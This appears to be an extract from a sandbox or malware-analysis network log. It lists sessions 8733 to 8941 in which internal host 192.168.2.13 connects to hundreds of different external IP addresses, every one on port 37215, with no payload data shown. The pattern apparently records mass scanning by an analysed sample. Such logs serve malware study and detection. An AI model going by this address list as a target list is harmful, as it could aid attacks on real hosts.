                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8733192.168.2.1347556197.12.69.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8734192.168.2.133766260.239.67.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8735192.168.2.1354244157.179.168.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8736192.168.2.1345856197.128.160.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8737192.168.2.1348496157.11.180.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8738192.168.2.135823841.70.235.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8739192.168.2.1340286157.47.137.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8740192.168.2.1358504197.113.110.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8741192.168.2.1353040197.215.161.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8742192.168.2.1346718197.157.50.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8743192.168.2.1348116197.151.211.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8744192.168.2.133704241.249.104.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8745192.168.2.1343198157.60.167.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8746192.168.2.1339912157.247.241.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8747192.168.2.1360506169.174.151.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8748192.168.2.1352986157.234.153.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8749192.168.2.1337144179.223.69.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8750192.168.2.135047841.25.243.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8751192.168.2.1342460197.24.247.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8752192.168.2.1335256138.160.57.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8753192.168.2.1342602157.131.166.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8754192.168.2.135074241.97.36.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8755192.168.2.1346722157.106.44.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8756192.168.2.1344086157.152.45.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8757192.168.2.134974641.163.16.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8758192.168.2.135395641.119.114.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8759192.168.2.1339740197.124.182.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8760192.168.2.1344534197.92.213.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8761192.168.2.135803258.255.102.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8762192.168.2.133400241.17.208.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8763192.168.2.1342222197.251.240.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8764192.168.2.1353572197.39.120.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8765192.168.2.1335344197.86.230.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8766192.168.2.134159241.98.82.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8767192.168.2.1358138157.206.83.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8768192.168.2.134968041.64.218.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8769192.168.2.1357864146.100.174.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8770192.168.2.1350400197.17.19.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8771192.168.2.133653041.186.150.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8772192.168.2.1335040121.149.2.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8773192.168.2.134619241.190.221.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8774192.168.2.1347376197.186.253.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8775192.168.2.1344926152.166.246.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8776192.168.2.1336364157.121.158.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8777192.168.2.1337058165.127.32.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8778192.168.2.133447441.208.245.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8779192.168.2.135542041.227.133.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8780192.168.2.135845472.187.208.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8781192.168.2.1360782176.228.150.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8782192.168.2.1338374197.14.18.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8783192.168.2.1337900197.195.166.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8784192.168.2.134198641.86.88.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8785192.168.2.1351890157.244.225.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8786192.168.2.1349014197.156.179.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8787192.168.2.133797241.241.43.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8788192.168.2.133642050.229.144.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8789192.168.2.1341342157.150.193.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8790192.168.2.1338614197.116.142.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8791192.168.2.1359284157.131.43.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8792192.168.2.1341016157.144.29.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8793192.168.2.1341640167.241.244.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8794192.168.2.1337788157.243.153.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8795192.168.2.1343406212.58.170.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8796192.168.2.134429641.83.162.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8797192.168.2.1360902197.75.116.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8798192.168.2.1348980126.192.177.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8799192.168.2.1358896108.246.232.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8800192.168.2.1340614197.181.68.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8801192.168.2.1342006197.206.166.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8802192.168.2.1350864157.19.204.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8803192.168.2.1349114197.93.106.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8804192.168.2.1358052157.91.45.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8805192.168.2.135765241.107.43.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8806192.168.2.1342832197.244.248.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8807192.168.2.1333940157.122.31.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8808192.168.2.1343256157.119.204.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8809192.168.2.1343516197.252.11.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8810192.168.2.1344094157.18.18.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8811192.168.2.1337088157.213.240.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8812192.168.2.135187841.215.140.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8813192.168.2.1343334157.116.26.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8814192.168.2.1360404211.128.125.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8815192.168.2.1346370157.230.191.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8816192.168.2.1348286197.219.11.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8817192.168.2.1346460157.100.125.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8818192.168.2.1346326157.238.140.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8819192.168.2.134301641.180.29.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8820192.168.2.135231241.55.151.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8821192.168.2.136066241.197.50.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8822192.168.2.1347550157.96.55.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8823192.168.2.1358824157.89.53.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8824192.168.2.133519041.88.64.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8825192.168.2.135333641.167.86.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8826192.168.2.1349510197.62.155.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8827192.168.2.1355540197.232.145.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8828192.168.2.1358760197.2.63.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8829192.168.2.1344828157.0.3.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8830192.168.2.1351686197.221.22.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8831192.168.2.1341938197.101.6.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8832192.168.2.133835641.45.27.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8833192.168.2.1355794197.130.162.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8834192.168.2.1350122197.140.79.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8835192.168.2.1342694157.3.54.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8836192.168.2.1347074197.149.199.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8837192.168.2.1337806157.139.187.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8838192.168.2.1335080197.213.127.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8839192.168.2.1359312157.70.150.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8840192.168.2.1340410157.102.173.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8841192.168.2.1332972175.142.26.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8842192.168.2.135844234.173.39.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8843192.168.2.134775041.117.2.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8844192.168.2.1348202197.125.189.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8845192.168.2.1333390197.207.126.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8846192.168.2.134871869.206.162.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8847192.168.2.1337744157.230.173.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8848192.168.2.1349204197.80.112.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8849192.168.2.1345076197.227.237.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8850192.168.2.134993224.207.103.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8851192.168.2.1355702157.212.227.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8852192.168.2.1333724157.17.30.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8853192.168.2.1356606157.131.219.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8854192.168.2.1360894157.35.103.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8855192.168.2.134570641.88.230.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8856192.168.2.133508841.168.233.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8857192.168.2.133999014.149.55.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8858192.168.2.1357992157.167.60.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8859192.168.2.1353778123.139.230.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8860192.168.2.134364241.125.199.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8861192.168.2.133567041.61.137.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8862192.168.2.1351762157.74.64.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8863192.168.2.1339604197.254.130.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8864192.168.2.134706241.7.155.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8865192.168.2.133284690.37.144.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8866192.168.2.134141841.217.31.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8867192.168.2.1335228197.156.207.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8868192.168.2.1349512157.217.217.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8869192.168.2.1350740157.164.221.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8870192.168.2.135125441.174.130.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8871192.168.2.134099266.189.158.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8872192.168.2.1354022157.248.151.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8873192.168.2.1358992197.131.99.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8874192.168.2.1340716157.228.120.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8875192.168.2.1351806197.246.151.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8876192.168.2.1346150157.120.228.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8877192.168.2.1356292157.225.225.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8878192.168.2.134591841.139.164.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8879192.168.2.1338576208.179.198.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8880192.168.2.136045472.108.129.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8881192.168.2.135766641.116.201.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8882192.168.2.1342064114.0.32.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8883192.168.2.1343594157.62.182.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8884192.168.2.1340894197.94.126.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8885192.168.2.134922841.101.182.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8886192.168.2.135377441.39.214.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8887192.168.2.133573241.151.84.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8888192.168.2.135007641.44.9.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8889192.168.2.1334494197.230.132.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8890192.168.2.1335230157.45.31.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8891192.168.2.1349818197.139.116.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8892192.168.2.133897441.77.6.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8893192.168.2.1358924157.9.251.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8894192.168.2.133631441.59.65.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8895192.168.2.1336934197.159.87.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8896192.168.2.136042441.116.154.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8897192.168.2.134405452.246.106.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8898192.168.2.135436641.79.194.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8899192.168.2.1337202157.200.130.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8900192.168.2.1333268197.184.31.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8901192.168.2.133974641.153.97.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8902192.168.2.1336716197.219.112.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8903192.168.2.1340364157.224.106.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8904192.168.2.1358974157.139.28.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8905192.168.2.134919841.85.91.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8906192.168.2.1343402157.33.180.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8907192.168.2.1350370157.147.105.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8908192.168.2.1336882157.126.81.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8909192.168.2.1355864157.179.186.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8910192.168.2.1345608157.171.192.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8911192.168.2.134737641.184.87.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8912192.168.2.133942041.178.214.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8913192.168.2.1335338157.236.69.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8914192.168.2.134349641.65.145.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8915192.168.2.1360152197.180.200.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8916192.168.2.1360720157.142.124.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8917192.168.2.13594084.82.157.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8918192.168.2.133453241.50.219.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8919192.168.2.1357746157.126.173.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8920192.168.2.1347110197.189.202.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8921192.168.2.1341820157.166.43.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8922192.168.2.1338878157.177.255.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8923192.168.2.1336724157.108.39.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8924192.168.2.1349200147.254.79.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8925192.168.2.135735041.176.180.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8926192.168.2.134430841.48.123.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8927192.168.2.1334496157.13.108.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8928192.168.2.1353554197.241.224.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8929192.168.2.135168861.4.101.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8930192.168.2.135538241.65.193.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8931192.168.2.1349308157.232.36.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8932192.168.2.133630041.200.246.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8933192.168.2.135270841.78.163.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8934192.168.2.1343544138.117.45.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8935192.168.2.1336704197.222.83.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8936192.168.2.1346738197.166.183.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8937192.168.2.1344576197.30.204.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8938192.168.2.1337826213.112.59.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8939192.168.2.1337608169.20.126.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8940192.168.2.1347460197.22.99.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8941192.168.2.1336652197.165.166.20637215
                                                  TimestampBytes transferredDirectionData


